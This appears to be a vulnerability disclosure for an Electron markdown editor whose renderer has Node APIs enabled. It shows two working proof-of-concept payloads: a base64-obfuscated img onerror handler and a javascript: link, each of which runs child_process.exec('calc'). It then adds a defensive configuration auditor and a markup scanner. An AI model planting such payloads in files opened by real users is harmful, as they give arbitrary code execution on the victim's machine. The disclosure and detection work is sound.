`nodeIntegration: true` determines that Node APIs are enabled in the renderer, and the Markdown Editor does not filter dangerous operations. When we use this software to open an unknown markdown file, it may cause remote code execution (RCE).
nodeIntegration: true
EXP
```markdown
# 0 click
<img src=# onerror='eval(new Buffer(`amF2YXNjcmlwdDpyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnY2FsYycsIChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57YWxlcnQoJ1lvdSB3ZXJlIGhhY2tlZC4nKX0p`, `base64`).toString())'>

# 1 click
<a href="javascript:require('child_process').exec('calc', (error, stdout, stderr)=>{alert('You were hacked.')})">CLICK</a>
```
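A defensive check for the two conditions this report combines, written as an added example that is not code from the project or from the reporter: it audits a `BrowserWindow` `webPreferences` object and flags the two markup patterns shown above in a markdown file before it is rendered. The function names and the sample document are assumptions constructed for illustration, and the pattern scan is a triage heuristic, not a sanitizer.

```javascript
// Added example (not project code). Function names are hypothetical.

// Real Electron webPreferences keys, with the values that keep Node APIs
// out of the renderer. Explicit values are required so the result does not
// depend on the defaults of a particular Electron version.
const REQUIRED_PREFS = { nodeIntegration: false, contextIsolation: true, sandbox: true };

function auditWebPreferences(prefs) {
  const findings = [];
  for (const [key, safe] of Object.entries(REQUIRED_PREFS)) {
    if (prefs[key] !== safe) {
      findings.push(`${key} should be ${safe} (got ${prefs[key]})`);
    }
  }
  return findings;
}

// Heuristic patterns for the two vectors in the report: an inline event
// handler on a raw HTML tag, and a javascript: URL in a link or source.
const PATTERNS = [
  { id: 'inline-event-handler', re: /<[a-z][^>]*\son[a-z]+\s*=/i },
  { id: 'javascript-url', re: /(?:href|src)\s*=\s*["']?\s*javascript:/i },
  { id: 'markdown-javascript-link', re: /\]\(\s*javascript:/i },
];

// Returns one hit per matching pattern per line, with 1-based line numbers.
function scanMarkdown(text) {
  const hits = [];
  text.split(/\r?\n/).forEach((line, i) => {
    for (const { id, re } of PATTERNS) {
      if (re.test(line)) hits.push({ line: i + 1, id });
    }
  });
  return hits;
}

// Constructed sample document with inert handlers, for demonstration only.
const SAMPLE = [
  '# Notes',
  "<img src=# onerror='console.log(1)'>",
  '<a href="javascript:void(0)">CLICK</a>',
  '[docs](https://example.com/docs)',
].join('\n');

console.log(auditWebPreferences({ nodeIntegration: true }));
console.log(scanMarkdown(SAMPLE));
```

A clean scan does not make a file safe to render with Node APIs enabled; the `webPreferences` settings are the control, and rendered HTML should still pass through a maintained sanitizer.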